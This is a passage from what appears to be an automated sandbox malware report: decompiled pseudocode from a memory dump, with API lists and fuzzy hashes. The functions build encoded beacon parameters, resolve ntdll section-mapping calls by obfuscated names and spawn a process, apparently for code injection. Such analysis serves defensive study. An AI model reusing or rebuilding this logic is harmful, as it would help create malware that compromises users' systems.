                                                        								_t89 = _t89;
                                                        								_t86 = _t86;
                                                        								_t66 = _a8;
                                                        								_t55 = _t54;
                                                        								_t106 = _t54;
                                                        								if(_t106 == 0) {
                                                        									goto L8;
                                                        								} else {
                                                        									if(_t106 < 0) {
                                                        										_t46 = 0;
                                                        									} else {
                                                        										_t82 =  *(_t66 + 8);
                                                        										E01207F40(_t55, _t66);
                                                        										_t89 = _t66 + 0x10;
                                                        										E01207F9B(_t89, _t66, 0);
                                                        										_t99 = _t99 + 0xc;
                                                        										E01208037(_t82[2]);
                                                        										 *(_t66 + 0xc) =  *_t82;
                                                        										_t66 = 0;
                                                        										_t86 = 0;
                                                        										 *(_t82[2])(1);
                                                        										goto L8;
                                                        									}
                                                        								}
                                                        							}
                                                        							goto L13;
                                                        						}
                                                        						L11:
                                                        						_t46 = 1;
                                                        					}
                                                        				}
                                                        				L13:
                                                        				return _t46;
                                                        			}
                                                        Instruction address gutter for the decompiled code above (one address per source line, 0x00000000 where a line maps to no instruction; first entry 0x01207e34, last entry 0x01207f1d).

                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                        • Instruction ID: 6ed9f7d458192765ac38e205a85fac06f8ed3f8f2c05022135ca6fe0e0f1d8c3
                                                        • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                        • Instruction Fuzzy Hash: 6B21B6729112059FDB11EF68C8C49ABBBA5FF44350B0586A8DE558B286D730FD15C7E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 77%
                                                        			E0120254C(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                                                        				void* _v8;
                                                        				void* _v12;
                                                        				void* _v16;
                                                        				void* _v20;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				long _t63;
                                                        				intOrPtr _t64;
                                                        				intOrPtr _t65;
                                                        				intOrPtr _t66;
                                                        				intOrPtr _t67;
                                                        				intOrPtr _t68;
                                                        				void* _t71;
                                                        				intOrPtr _t72;
                                                        				int _t75;
                                                        				void* _t76;
                                                        				intOrPtr _t77;
                                                        				intOrPtr _t81;
                                                        				intOrPtr _t85;
                                                        				intOrPtr _t86;
                                                        				void* _t88;
                                                        				void* _t91;
                                                        				intOrPtr _t95;
                                                        				intOrPtr _t99;
                                                        				intOrPtr* _t101;
                                                        				void* _t107;
                                                        				intOrPtr _t111;
                                                        				signed int _t115;
                                                        				char** _t117;
                                                        				int _t120;
                                                        				intOrPtr* _t123;
                                                        				intOrPtr* _t125;
                                                        				intOrPtr* _t127;
                                                        				intOrPtr* _t129;
                                                        				intOrPtr _t132;
                                                        				intOrPtr _t135;
                                                        				int _t138;
                                                        				intOrPtr _t139;
                                                        				int _t142;
                                                        				void* _t143;
                                                        				void* _t144;
                                                        				void* _t154;
                                                        				int _t157;
                                                        				void* _t158;
                                                        				void* _t159;
                                                        				void* _t160;
                                                        				intOrPtr _t161;
                                                        				void* _t163;
                                                        				long _t167;
                                                        				intOrPtr* _t168;
                                                        				intOrPtr* _t171;
                                                        				void* _t172;
                                                        				void* _t174;
                                                        				void* _t175;
                                                        				void* _t180;
                                                        
                                                        				_t154 = __edx;
                                                        				_t144 = __ecx;
                                                        				_t63 = __eax;
                                                        				_t143 = _a20;
                                                        				_a20 = 8;
                                                        				if(__eax == 0) {
                                                        					_t63 = GetTickCount();
                                                        				}
                                                        				_t64 =  *0x120a018; // 0x4ef75f3d
                                                        				asm("bswap eax");
                                                        				_t65 =  *0x120a014; // 0x5cb11ae7
                                                        				asm("bswap eax");
                                                        				_t66 =  *0x120a010; // 0x15dc9586
                                                        				asm("bswap eax");
                                                        				_t67 =  *0x120a00c; // 0x8e03bf7
                                                        				asm("bswap eax");
                                                        				_t68 =  *0x120a2d4; // 0x455d5a8
                                                        				_t3 = _t68 + 0x120b622; // 0x74666f73
                                                        				_t157 = wsprintfA(_t143, _t3, 3, 0x3d163, _t67, _t66, _t65, _t64,  *0x120a02c,  *0x120a004, _t63);
                                                        				_t71 = E01206A9F();
                                                        				_t72 =  *0x120a2d4; // 0x455d5a8
                                                        				_t4 = _t72 + 0x120b662; // 0x74707526
                                                        				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
                                                        				_t174 = _t172 + 0x38;
                                                        				_t158 = _t157 + _t75;
                                                        				if(_a8 != 0) {
                                                        					_t139 =  *0x120a2d4; // 0x455d5a8
                                                        					_t8 = _t139 + 0x120b66d; // 0x732526
                                                        					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
                                                        					_t174 = _t174 + 0xc;
                                                        					_t158 = _t158 + _t142;
                                                        				}
                                                        				_t76 = E01202C60(_t144);
                                                        				_t77 =  *0x120a2d4; // 0x455d5a8
                                                        				_t10 = _t77 + 0x120b38a; // 0x6d697426
                                                        				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
                                                        				_t81 =  *0x120a2d4; // 0x455d5a8
                                                        				_t12 = _t81 + 0x120b7b4; // 0x5768d5c
                                                        				_t180 = _a4 - _t12;
                                                        				_t14 = _t81 + 0x120b33b; // 0x74636126
                                                        				_t156 = 0 | _t180 == 0x00000000;
                                                        				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
                                                        				_t85 =  *0x120a31c; // 0x57695e0
                                                        				_t175 = _t174 + 0x1c;
                                                        				if(_t85 != 0) {
                                                        					_t135 =  *0x120a2d4; // 0x455d5a8
                                                        					_t18 = _t135 + 0x120b8e9; // 0x3d736f26
                                                        					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
                                                        					_t175 = _t175 + 0xc;
                                                        					_t160 = _t160 + _t138;
                                                        				}
                                                        				_t86 =  *0x120a32c; // 0x57695b0
                                                        				if(_t86 != 0) {
                                                        					_t132 =  *0x120a2d4; // 0x455d5a8
                                                        					_t20 = _t132 + 0x120b685; // 0x73797326
                                                        					wsprintfA(_t160 + _t143, _t20, _t86);
                                                        					_t175 = _t175 + 0xc;
                                                        				}
                                                        				_t161 =  *0x120a37c; // 0x5769630
                                                        				_t88 = E01203A66(0x120a00a, _t161 + 4);
                                                        				_t167 = 0;
                                                        				_v12 = _t88;
                                                        				if(_t88 == 0) {
                                                        					L28:
                                                        					HeapFree( *0x120a290, _t167, _t143);
                                                        					return _a20;
                                                        				} else {
                                                        					_t91 = RtlAllocateHeap( *0x120a290, 0, 0x800);
                                                        					_a8 = _t91;
                                                        					if(_t91 == 0) {
                                                        						L27:
                                                        						HeapFree( *0x120a290, _t167, _v12);
                                                        						goto L28;
                                                        					}
                                                        					E01202C46(GetTickCount());
                                                        					_t95 =  *0x120a37c; // 0x5769630
                                                        					__imp__(_t95 + 0x40);
                                                        					asm("lock xadd [eax], ecx");
                                                        					_t99 =  *0x120a37c; // 0x5769630
                                                        					__imp__(_t99 + 0x40);
                                                        					_t101 =  *0x120a37c; // 0x5769630
                                                        					_t163 = E01207156(1, _t156, _t143,  *_t101);
                                                        					_v20 = _t163;
                                                        					asm("lock xadd [eax], ecx");
                                                        					if(_t163 == 0) {
                                                        						L26:
                                                        						HeapFree( *0x120a290, _t167, _a8);
                                                        						goto L27;
                                                        					}
                                                        					StrTrimA(_t163, 0x12092ac);
                                                        					_push(_t163);
                                                        					_t107 = E01205C8D();
                                                        					_v8 = _t107;
                                                        					if(_t107 == 0) {
                                                        						L25:
                                                        						HeapFree( *0x120a290, _t167, _t163);
                                                        						goto L26;
                                                        					}
                                                        					 *_t163 = 0;
                                                        					__imp__(_a8, _v12);
                                                        					_t168 = __imp__;
                                                        					 *_t168(_a8, _v8);
                                                        					_t111 = E01203FC1( *_t168(_a8, _t163), _a8);
                                                        					_a4 = _t111;
                                                        					if(_t111 == 0) {
                                                        						_a20 = 8;
                                                        						L23:
                                                        						E01203546();
                                                        						L24:
                                                        						HeapFree( *0x120a290, 0, _v8);
                                                        						_t167 = 0;
                                                        						goto L25;
                                                        					}
                                                        					_t115 = E012058A0(_t143, 0xffffffffffffffff, _t163,  &_v16);
                                                        					_a20 = _t115;
                                                        					if(_t115 == 0) {
                                                        						_t171 = _v16;
                                                        						_a20 = E0120627E(_t171, _a4, _a12, _a16);
                                                        						_t123 =  *((intOrPtr*)(_t171 + 8));
                                                        						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                                                        						_t125 =  *((intOrPtr*)(_t171 + 8));
                                                        						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                                        						_t127 =  *((intOrPtr*)(_t171 + 4));
                                                        						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                                        						_t129 =  *_t171;
                                                        						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                                        						E012013CC(_t171);
                                                        					}
                                                        					if(_a20 != 0x10d2) {
                                                        						L18:
                                                        						if(_a20 == 0) {
                                                        							_t117 = _a12;
                                                        							if(_t117 != 0) {
                                                        								_t164 =  *_t117;
                                                        								_t169 =  *_a16;
                                                        								wcstombs( *_t117,  *_t117,  *_a16);
                                                        								_t120 = E012037F6(_t164, _t164, _t169 >> 1);
                                                        								_t163 = _v20;
                                                        								 *_a16 = _t120;
                                                        							}
                                                        						}
                                                        						goto L21;
                                                        					} else {
                                                        						if(_a12 != 0) {
                                                        							L21:
                                                        							E012013CC(_a4);
                                                        							if(_a20 == 0 || _a20 == 0x10d2) {
                                                        								goto L24;
                                                        							} else {
                                                        								goto L23;
                                                        							}
                                                        						}
                                                        						_a20 = _a20 & 0x00000000;
                                                        						goto L18;
                                                        					}
                                                        				}
                                                        			}

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 01202563
                                                        • wsprintfA.USER32 ref: 012025B0
                                                        • wsprintfA.USER32 ref: 012025CD
                                                        • wsprintfA.USER32 ref: 012025ED
                                                        • wsprintfA.USER32 ref: 0120260B
                                                        • wsprintfA.USER32 ref: 0120262E
                                                        • wsprintfA.USER32 ref: 0120264F
                                                        • wsprintfA.USER32 ref: 0120266F
                                                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 012026A0
                                                        • GetTickCount.KERNEL32 ref: 012026B1
                                                        • RtlEnterCriticalSection.NTDLL(057695F0), ref: 012026C5
                                                        • RtlLeaveCriticalSection.NTDLL(057695F0), ref: 012026E3
                                                          • Part of subcall function 01207156: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,01204A9F,00000000,05769630), ref: 01207181
                                                          • Part of subcall function 01207156: lstrlen.KERNEL32(00000000,?,00000000,01204A9F,00000000,05769630), ref: 01207189
                                                          • Part of subcall function 01207156: strcpy.NTDLL ref: 012071A0
                                                          • Part of subcall function 01207156: lstrcat.KERNEL32(00000000,00000000), ref: 012071AB
                                                          • Part of subcall function 01207156: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,01204A9F,?,00000000,01204A9F,00000000,05769630), ref: 012071C8
                                                        • StrTrimA.SHLWAPI(00000000,012092AC,?,05769630), ref: 01202718
                                                          • Part of subcall function 01205C8D: lstrlen.KERNEL32(0576887A,00000000,00000000,00000000,01204AC6,00000000), ref: 01205C9D
                                                          • Part of subcall function 01205C8D: lstrlen.KERNEL32(?), ref: 01205CA5
                                                          • Part of subcall function 01205C8D: lstrcpy.KERNEL32(00000000,0576887A), ref: 01205CB9
                                                          • Part of subcall function 01205C8D: lstrcat.KERNEL32(00000000,?), ref: 01205CC4
                                                        • lstrcpy.KERNEL32(00000000,?), ref: 01202738
                                                        • lstrcat.KERNEL32(00000000,?), ref: 0120274A
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 01202750
                                                          • Part of subcall function 01203FC1: lstrlen.KERNEL32(?,00000000,05769CD0,7742C740,012035B6,05769ED5,0120454B,0120454B,?,0120454B,?,69B25F44,E8FA7DD7,00000000), ref: 01203FC8
                                                          • Part of subcall function 01203FC1: mbstowcs.NTDLL ref: 01203FF1
                                                          • Part of subcall function 01203FC1: memset.NTDLL ref: 01204003
                                                        • wcstombs.NTDLL ref: 012027E1
                                                          • Part of subcall function 0120627E: SysAllocString.OLEAUT32(00000000), ref: 012062BF
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 01202822
                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01202832
                                                        • HeapFree.KERNEL32(00000000,00000000,?,05769630), ref: 01202842
                                                        • HeapFree.KERNEL32(00000000,?), ref: 01202852
                                                        • HeapFree.KERNEL32(00000000,?), ref: 01202860
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                        • String ID:
                                                        • API String ID: 972889839-0
                                                        • Opcode ID: 4cffaecbdcbfa861bdefb007c770570f94aa585f246857902864fe254a9095e7
                                                        • Instruction ID: 41831e18cf05076b59b8643d686f9b4117bda988c42d2ffbfe4e9cc1c07eb163
                                                        • Opcode Fuzzy Hash: 4cffaecbdcbfa861bdefb007c770570f94aa585f246857902864fe254a9095e7
                                                        • Instruction Fuzzy Hash: 87A16F71500219EFDB23DF68EC8CEAA3BA9FF48354B144225F909C7262D735D954CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 43%
                                                        			E01206414(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				long _v16;
                                                        				WCHAR* _v20;
                                                        				signed int _v24;
                                                        				void* __esi;
                                                        				long _t43;
                                                        				intOrPtr _t44;
                                                        				intOrPtr _t46;
                                                        				void* _t48;
                                                        				void* _t49;
                                                        				void* _t50;
                                                        				WCHAR* _t54;
                                                        				intOrPtr _t57;
                                                        				void* _t58;
                                                        				void* _t59;
                                                        				void* _t60;
                                                        				intOrPtr _t66;
                                                        				void* _t71;
                                                        				void* _t74;
                                                        				intOrPtr _t75;
                                                        				void* _t77;
                                                        				intOrPtr _t79;
                                                        				intOrPtr* _t80;
                                                        				WCHAR* _t91;
                                                        
                                                        				_t79 =  *0x120a38c; // 0x5769bd8
                                                        				_v24 = 8;
                                                        				_t43 = GetTickCount();
                                                        				_push(5);
                                                        				_t74 = 0xa;
                                                        				_v16 = _t43;
                                                        				_t44 = E01202292(_t74,  &_v16);
                                                        				_v8 = _t44;
                                                        				if(_t44 == 0) {
                                                        					_v8 = 0x12091ac;
                                                        				}
                                                        				_t46 = E012016F4(_t79);
                                                        				_v12 = _t46;
                                                        				if(_t46 != 0) {
                                                        					_t80 = __imp__;
                                                        					_t48 =  *_t80(_v8, _t71);
                                                        					_t49 =  *_t80(_v12);
                                                        					_t50 =  *_t80(_a4);
                                                        					_t54 = E01205FBC(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                        					_v20 = _t54;
                                                        					if(_t54 != 0) {
                                                        						_t75 =  *0x120a2d4; // 0x455d5a8
                                                        						_t16 = _t75 + 0x120bab8; // 0x530025
                                                        						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                        						_push(4);
                                                        						_t77 = 5;
                                                        						_t57 = E01202292(_t77,  &_v16);
                                                        						_v8 = _t57;
                                                        						if(_t57 == 0) {
                                                        							_v8 = 0x12091b0;
                                                        						}
                                                        						_t58 =  *_t80(_v8);
                                                        						_t59 =  *_t80(_v12);
                                                        						_t60 =  *_t80(_a4);
                                                        						_t91 = E01205FBC(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                        						if(_t91 == 0) {
                                                        							E012013CC(_v20);
                                                        						} else {
                                                        							_t66 =  *0x120a2d4; // 0x455d5a8
                                                        							_t31 = _t66 + 0x120bbd8; // 0x73006d
                                                        							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                        							 *_a16 = _v20;
                                                        							_v24 = _v24 & 0x00000000;
                                                        							 *_a20 = _t91;
                                                        						}
                                                        					}
                                                        					E012013CC(_v12);
                                                        				}
                                                        				return _v24;
                                                        			}

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 01206429
                                                        • lstrlen.KERNEL32(?,80000002,00000005), ref: 01206469
                                                        • lstrlen.KERNEL32(00000000), ref: 01206472
                                                        • lstrlen.KERNEL32(00000000), ref: 01206479
                                                        • lstrlenW.KERNEL32(80000002), ref: 01206486
                                                        • wsprintfW.USER32 ref: 012064BF
                                                        • lstrlen.KERNEL32(?,00000004), ref: 012064E6
                                                        • lstrlen.KERNEL32(?), ref: 012064EF
                                                        • lstrlen.KERNEL32(?), ref: 012064F6
                                                        • lstrlenW.KERNEL32(?), ref: 012064FD
                                                        • wsprintfW.USER32 ref: 01206530
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                                        • String ID:
                                                        • API String ID: 822878831-0
                                                        • Opcode ID: 178db966b594e25ed6d10dd4869f5e1284234bfada10190b8894d6ab06d6b61c
                                                        • Instruction ID: 6fad7d22a415b969573ebaad066bef4c1a7ec49956a2e32571192034797b6075
                                                        • Opcode Fuzzy Hash: 178db966b594e25ed6d10dd4869f5e1284234bfada10190b8894d6ab06d6b61c
                                                        • Instruction Fuzzy Hash: 3A415E7690021AFFCF22AFA4DC0899EBFB5EF44308F050255EE04A7253D7369A64DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 61%
                                                        			E01202F12(void* __eax, void* __ecx) {
                                                        				long _v8;
                                                        				void* _v12;
                                                        				void* _v16;
                                                        				void* _v28;
                                                        				long _v32;
                                                        				void _v104;
                                                        				char _v108;
                                                        				long _t39;
                                                        				intOrPtr _t43;
                                                        				intOrPtr _t50;
                                                        				void* _t52;
                                                        				intOrPtr _t53;
                                                        				void* _t61;
                                                        				intOrPtr* _t66;
                                                        				intOrPtr* _t73;
                                                        				intOrPtr* _t76;
                                                        
                                                        				_t1 = __eax + 0x14; // 0x74183966
                                                        				_t71 =  *_t1;
                                                        				_t39 = E01206ACC(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                        				_v8 = _t39;
                                                        				if(_t39 != 0) {
                                                        					L12:
                                                        					return _v8;
                                                        				}
                                                        				E012077FF( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
                                                        				_t43 = _v12(_v12);
                                                        				_v8 = _t43;
                                                        				if(_t43 == 0 && ( *0x120a2b8 & 0x00000001) != 0) {
                                                        					_v32 = 0;
                                                        					asm("stosd");
                                                        					asm("stosd");
                                                        					asm("stosd");
                                                        					_v108 = 0;
                                                        					memset( &_v104, 0, 0x40);
                                                        					_t50 =  *0x120a2d4; // 0x455d5a8
                                                        					_t18 = _t50 + 0x120b55b; // 0x73797325
                                                        					_t52 = E01204B6B(_t18);
                                                        					_v12 = _t52;
                                                        					if(_t52 == 0) {
                                                        						_v8 = 8;
                                                        					} else {
                                                        						_t53 =  *0x120a2d4; // 0x455d5a8
                                                        						_t20 = _t53 + 0x120b73d; // 0x5768ce5
                                                        						_t21 = _t53 + 0x120b0af; // 0x4e52454b
                                                        						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                                                        						if(_t66 == 0) {
                                                        							_v8 = 0x7f;
                                                        						} else {
                                                        							_t73 = __imp__;
                                                        							_v108 = 0x44;
                                                        							 *_t73(0);
                                                        							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
                                                        							 *_t73(1);
                                                        							if(_t61 == 0) {
                                                        								_v8 = GetLastError();
                                                        							} else {
                                                        								CloseHandle(_v28);
                                                        								CloseHandle(_v32);
                                                        							}
                                                        						}
                                                        						HeapFree( *0x120a290, 0, _v12);
                                                        					}
                                                        				}
                                                        				_t76 = _v16;
                                                        				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
                                                        				E012013CC(_t76);
                                                        				goto L12;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 01206ACC: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,01202F2E,?,?,?,?,00000000,00000000), ref: 01206AF1
                                                          • Part of subcall function 01206ACC: GetProcAddress.KERNEL32(00000000,7243775A), ref: 01206B13
                                                          • Part of subcall function 01206ACC: GetProcAddress.KERNEL32(00000000,614D775A), ref: 01206B29
                                                          • Part of subcall function 01206ACC: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01206B3F
                                                          • Part of subcall function 01206ACC: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01206B55
                                                          • Part of subcall function 01206ACC: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01206B6B
                                                        • memset.NTDLL ref: 01202F7C
                                                          • Part of subcall function 01204B6B: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,01202F95,73797325), ref: 01204B7C
                                                          • Part of subcall function 01204B6B: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01204B96
                                                        • GetModuleHandleA.KERNEL32(4E52454B,05768CE5,73797325), ref: 01202FB3
                                                        • GetProcAddress.KERNEL32(00000000), ref: 01202FBA
                                                        • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 01202FD4
                                                        • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 01202FF2
                                                        • CloseHandle.KERNEL32(00000000), ref: 01203001
                                                        • CloseHandle.KERNEL32(?), ref: 01203006
                                                        • GetLastError.KERNEL32 ref: 0120300A
                                                        • HeapFree.KERNEL32(00000000,?), ref: 01203026
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                                        • String ID:
                                                        • API String ID: 91923200-0
                                                        • Opcode ID: f642edd8e8da7a54cb2e404afe1ec63072d30e4f52147558062d498999f2f3f7
                                                        • Instruction ID: 3edc119e2aba69014fe7ede2f6b58fe347264c75579ac6b36675d9f4086c510a
                                                        • Opcode Fuzzy Hash: f642edd8e8da7a54cb2e404afe1ec63072d30e4f52147558062d498999f2f3f7
                                                        • Instruction Fuzzy Hash: 7B315E71911219AFDF22EFA4DC489DEBFBAFF04340F104261E605A3156D7759644CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01206ACC(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _t23;
                                                        				intOrPtr _t26;
                                                        				_Unknown_base(*)()* _t28;
                                                        				intOrPtr _t30;
                                                        				_Unknown_base(*)()* _t32;
                                                        				intOrPtr _t33;
                                                        				_Unknown_base(*)()* _t35;
                                                        				intOrPtr _t36;
                                                        				_Unknown_base(*)()* _t38;
                                                        				intOrPtr _t39;
                                                        				_Unknown_base(*)()* _t41;
                                                        				intOrPtr _t44;
                                                        				struct HINSTANCE__* _t48;
                                                        				intOrPtr _t54;
                                                        
                                                        				_t54 = E01205FBC(0x20);
                                                        				if(_t54 == 0) {
                                                        					_v8 = 8;
                                                        				} else {
                                                        					_t23 =  *0x120a2d4; // 0x455d5a8
                                                        					_t1 = _t23 + 0x120b11a; // 0x4c44544e
                                                        					_t48 = GetModuleHandleA(_t1);
                                                        					_t26 =  *0x120a2d4; // 0x455d5a8
                                                        					_t2 = _t26 + 0x120b787; // 0x7243775a
                                                        					_v8 = 0x7f;
                                                        					_t28 = GetProcAddress(_t48, _t2);
                                                        					 *(_t54 + 0xc) = _t28;
                                                        					if(_t28 == 0) {
                                                        						L8:
                                                        						E012013CC(_t54);
                                                        					} else {
                                                        						_t30 =  *0x120a2d4; // 0x455d5a8
                                                        						_t5 = _t30 + 0x120b774; // 0x614d775a
                                                        						_t32 = GetProcAddress(_t48, _t5);
                                                        						 *(_t54 + 0x10) = _t32;
                                                        						if(_t32 == 0) {
                                                        							goto L8;
                                                        						} else {
                                                        							_t33 =  *0x120a2d4; // 0x455d5a8
                                                        							_t7 = _t33 + 0x120b797; // 0x6e55775a
                                                        							_t35 = GetProcAddress(_t48, _t7);
                                                        							 *(_t54 + 0x14) = _t35;
                                                        							if(_t35 == 0) {
                                                        								goto L8;
                                                        							} else {
                                                        								_t36 =  *0x120a2d4; // 0x455d5a8
                                                        								_t9 = _t36 + 0x120b756; // 0x4e6c7452
                                                        								_t38 = GetProcAddress(_t48, _t9);
                                                        								 *(_t54 + 0x18) = _t38;
                                                        								if(_t38 == 0) {
                                                        									goto L8;
                                                        								} else {
                                                        									_t39 =  *0x120a2d4; // 0x455d5a8
                                                        									_t11 = _t39 + 0x120b7ac; // 0x6c43775a
                                                        									_t41 = GetProcAddress(_t48, _t11);
                                                        									 *(_t54 + 0x1c) = _t41;
                                                        									if(_t41 == 0) {
                                                        										goto L8;
                                                        									} else {
                                                        										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                        										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                        										_t44 = E01206EB3(_t54, _a8);
                                                        										_v8 = _t44;
                                                        										if(_t44 != 0) {
                                                        											goto L8;
                                                        										} else {
                                                        											 *_a12 = _t54;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        				}
                                                        				return _v8;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,01202F2E,?,?,?,?,00000000,00000000), ref: 01206AF1
                                                        • GetProcAddress.KERNEL32(00000000,7243775A), ref: 01206B13
                                                        • GetProcAddress.KERNEL32(00000000,614D775A), ref: 01206B29
                                                        • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01206B3F
                                                        • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01206B55
                                                        • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01206B6B
                                                          • Part of subcall function 01206EB3: memset.NTDLL ref: 01206F32
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: AddressProc$AllocateHandleHeapModulememset
                                                        • String ID:
                                                        • API String ID: 1886625739-0
                                                        • Opcode ID: 8930fe5ea09eb97c94b1ccbeafaffd666ec4fe601713dca23db7517ad5827d3d
                                                        • Instruction ID: 6cddcaa19d3b30d1093292f0e33638e517e519d5b61c6eceb9b1855db5483c22
                                                        • Opcode Fuzzy Hash: 8930fe5ea09eb97c94b1ccbeafaffd666ec4fe601713dca23db7517ad5827d3d
                                                        • Instruction Fuzzy Hash: 61212DF1610707EFDB62EF69DC48E5A7BECEB04340B04462AE609D7243E735E9048B60
